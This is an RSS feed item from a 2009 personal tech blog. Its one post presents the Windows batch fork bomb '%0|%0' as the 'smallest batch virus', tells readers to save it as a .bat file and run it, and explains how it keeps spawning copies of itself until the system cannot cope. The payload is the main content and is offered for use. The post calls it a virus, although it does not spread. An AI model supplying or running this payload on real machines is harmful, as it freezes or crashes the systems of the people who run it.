<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Fetch1.com &#187; Treasure</title>
	<atom:link href="http://fetch1.com/category/treasure/feed" rel="self" type="application/rss+xml" />
	<link>http://fetch1.com</link>
	<description>Priyank Maniar&#039;s Weblog on Blogging, Programming, Windows, Technology and other stuff.</description>
	<lastBuildDate>Thu, 21 Jan 2010 23:49:19 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>World&#8217;s Most smallest Batch Virus</title>
		<link>http://fetch1.com/worlds-most-smallest-batch-virus/44</link>
		<comments>http://fetch1.com/worlds-most-smallest-batch-virus/44#comments</comments>
		<pubDate>Mon, 17 Aug 2009 20:15:52 +0000</pubDate>
		<dc:creator>fetch1</dc:creator>
				<category><![CDATA[Programming]]></category>
		<category><![CDATA[Treasure]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[Worlds Most smallest Batch Virus]]></category>

		<guid isPermaLink="false">http://fetch1.com/?p=44</guid>
		<description><![CDATA[This is the smallest batch virus only of 5 letters in length %0&#124;%0 save this as bat file n run it you cannot successfully exit this program&#8230;. Explanation %0 gives the location of bat file which is running it including the filename this program will create two instance of itself and each instance will again [...]]]></description>
			<content:encoded><![CDATA[<p>This is the smallest batch virus only of 5 letters in length</p>
<p>%0|%0</p>
<p>save this as bat file n run it</p>
<p>you cannot successfully exit this program&#8230;.</p>
<p><strong>Explanation</strong></p>
<p>%0 gives the location of bat file which is running it including the filename<br />
this program will create two instance of itself and each instance will again creates another two and it continues recursively. This is equivalent (not exactly) to executing a piece of code in an infinite loop( while(1){ //code } )</p>
<p>the operator &#8216;|&#8217; is called as the redirection operator(pipe operator)..this pipe operator sends one programs output to another programs input</p>
<p>%0 gives the fullpath to the batchfile in which it is coded. i.e. if you have saved the above code as abc.bat in C:\ drive.. then %0 will give the output as &#8216;C:\abc.bat</p>
<script type="text/javascript" class="owbutton" src="http://onlywire.com/button" title="World's Most smallest Batch Virus" url="http://fetch1.com/worlds-most-smallest-batch-virus/44"></script><h3  class="related_post_title">Random Posts</h3><ul class="related_post"><li><a href="http://fetch1.com/tips-for-buying-used-monitor/89" title="Tips for Buying used Monitor">Tips for Buying used Monitor</a></li><li><a href="http://fetch1.com/websites-to-submit-blogswebsites/74" title="A List of Websites Where you can submit your blogs/websites">A List of Websites Where you can submit your blogs/websites</a></li><li><a href="http://fetch1.com/how-to-make-an-autorun-file-for-cd/55" title="How to make An Autorun file for CD?">How to make An Autorun file for CD?</a></li><li><a href="http://fetch1.com/how-to-make-a-folder-delete-protected/57" title="How to make a folder delete protected?">How to make a folder delete protected?</a></li><li><a href="http://fetch1.com/google-talks-and-orkuts-secret-tricks-and-smileys/177" title="Google talk&#8217;s and Orkut&#8217;s secret Tricks and smileys">Google talk&#8217;s and Orkut&#8217;s secret Tricks and smileys</a></li><li><a href="http://fetch1.com/how-to-zoom-in-or-zoom-out-in-a-browser/30" title="How to Zoom in or Zoom out in a Browser?">How to Zoom in or Zoom out in a Browser?</a></li><li><a href="http://fetch1.com/how-to-remove-the-description-from-wordpress/7" title="How to Remove the Description from Wordpress?">How to Remove the Description from Wordpress?</a></li><li><a href="http://fetch1.com/how-to-prevent-ies-history-from-getting-deleted/59" title="How to Prevent IE&#8217;s History from getting deleted?">How to Prevent IE&#8217;s History from getting deleted?</a></li><li><a href="http://fetch1.com/running-system-command-through-java/111" title="Running system command through Java">Running system command through Java</a></li><li><a href="http://fetch1.com/hathway-increasing-the-download-speed/143" title="Hathway Increasing the Download Speed">Hathway Increasing the Download Speed</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://fetch1.com/worlds-most-smallest-batch-virus/44/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
